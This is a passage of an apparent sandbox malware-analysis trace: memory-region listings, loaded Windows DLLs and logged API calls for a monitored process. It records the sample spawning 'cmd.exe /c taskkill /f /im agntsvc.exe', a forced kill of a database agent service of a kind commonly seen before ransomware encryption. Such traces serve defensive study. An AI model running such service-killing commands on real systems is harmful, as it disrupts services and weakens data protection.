"c:\\windows\\syswow64\\mpr.dll") Region: id = 2828 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2829 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2830 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2831 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2832 start_va = 0x4480000 end_va = 0x44cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 2833 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2834 start_va = 0x44c0000 end_va = 0x44cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 2835 start_va = 0x4540000 end_va = 0x46c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004540000" filename = "" Region: id = 2836 start_va = 0x4730000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 2837 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2838 start_va = 0x4830000 end_va = 0x49b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004830000" filename = "" Region: id = 2839 start_va = 0x49c0000 end_va = 0x5dbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049c0000" filename = "" Region: id = 2840 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2841 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 2842 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 2843 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 2844 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 2845 start_va = 0x5dc0000 end_va = 0x60f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2846 start_va = 0x6100000 end_va = 0x61e9fff monitored = 0 entry_point = 0x613d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2847 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 2848 start_va = 0x6100000 end_va = 0x61dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2849 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2850 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 2851 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2852 start_va = 0x44e0000 end_va = 0x44e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 2853 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2854 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2855 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2856 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2857 start_va = 0x44f0000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 2858 start_va = 0x46d0000 end_va = 0x470ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 2859 start_va = 0x61e0000 end_va = 0x621ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061e0000" filename = "" Region: id = 2860 start_va = 0x6220000 end_va = 0x625ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006220000" filename = "" Region: id = 2861 start_va = 0x6260000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 2862 start_va = 0x62a0000 end_va = 0x62dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 2863 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2864 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2865 start_va = 0x4710000 end_va = 0x4715fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004710000" filename = "" Thread: id = 214 os_tid = 0x1300 Thread: id = 215 os_tid = 0x1360 Thread: id = 216 os_tid = 0x6a4 Thread: id = 217 os_tid = 0x104c Thread: id = 218 os_tid = 0x1080 Process: id = "36" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x30995000" os_pid = "0x1064" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im agntsvc.exeagntsvc.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2866 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2867 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2868 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2869 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2870 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2871 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2872 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2873 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2874 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2875 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2876 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 2877 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2878 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2879 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2880 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2881 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2882 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2883 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2884 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2885 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2886 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2887 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2888 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2889 start_va = 0x400000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2890 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2891 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2892 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2893 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2894 start_va = 0x520000 end_va = 0x5ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2895 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2896 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2897 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 2898 start_va = 0x720000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 2899 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2900 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2901 start_va = 0x870000 end_va = 0xba6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 219 os_tid = 0x1048 [0175.385] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0175.385] __set_app_type (_Type=0x1) [0175.385] __p__fmode () returned 0x74974d6c [0175.385] __p__commode () returned 0x74975b1c [0175.385] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0175.386] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0175.386] GetCurrentThreadId () returned 0x1048 [0175.386] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1048) returned 0x78 [0175.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0175.387] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0175.387] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.401] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.402] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0175.402] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.402] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0175.402] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0175.402] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.402] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0175.402] GetConsoleOutputCP () returned 0x1b5 [0175.404] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0175.404] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0175.404] _get_osfhandle (_FileHandle=1) returned 0x144 [0175.405] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0175.405] _get_osfhandle (_FileHandle=1) returned 0x144 [0175.405] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0175.405] _get_osfhandle (_FileHandle=0) returned 0x140 [0175.405] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0175.405] GetEnvironmentStringsW () returned 0x417ce0* [0175.405] GetProcessHeap () returned 0x410000 [0175.405] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa1a) returned 0x418708 [0175.406] FreeEnvironmentStringsA (penv="A") returned 1 [0175.406] GetProcessHeap () returned 0x410000 [0175.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4) returned 0x410550 [0175.406] GetEnvironmentStringsW () returned 0x417ce0* [0175.406] GetProcessHeap () returned 0x410000 [0175.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa1a) returned 0x419130 [0175.406] FreeEnvironmentStringsA (penv="A") returned 1 [0175.406] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0175.406] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0175.406] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0175.406] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0175.407] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0175.407] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0175.407] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0175.407] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0175.407] RegCloseKey (hKey=0x88) returned 0x0 [0175.407] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0175.407] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0175.408] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0175.408] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0175.408] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0175.408] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0175.408] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0175.408] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0175.408] RegCloseKey (hKey=0x88) returned 0x0 [0175.408] time (in: timer=0x0 | out: timer=0x0) returned 0x6234421d [0175.408] srand (_Seed=0x6234421d) [0175.408] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im agntsvc.exeagntsvc.exe \"" [0175.408] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im agntsvc.exeagntsvc.exe \"" [0175.408] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0175.409] GetProcessHeap () returned 0x410000 [0175.409] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x210) returned 0x419b58 [0175.409] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x419b60, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0175.409] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0175.409] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0175.409] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.409] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0175.409] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0175.409] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0175.409] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0175.409] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0175.409] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0175.409] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0175.409] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0175.410] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0175.410] GetProcessHeap () returned 0x410000 [0175.410] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418708) returned 1 [0175.412] GetEnvironmentStringsW () returned 0x417ce0* [0175.412] GetProcessHeap () returned 0x410000 [0175.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa32) returned 0x41a7b0 [0175.412] FreeEnvironmentStringsA (penv="A") returned 1 [0175.412] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0175.412] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.412] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0175.412] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0175.412] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0175.412] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0175.413] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0175.413] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0175.413] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0175.413] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0175.413] GetProcessHeap () returned 0x410000 [0175.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x44) returned 0x4105c8 [0175.417] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0175.417] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0175.418] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0175.418] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x410618 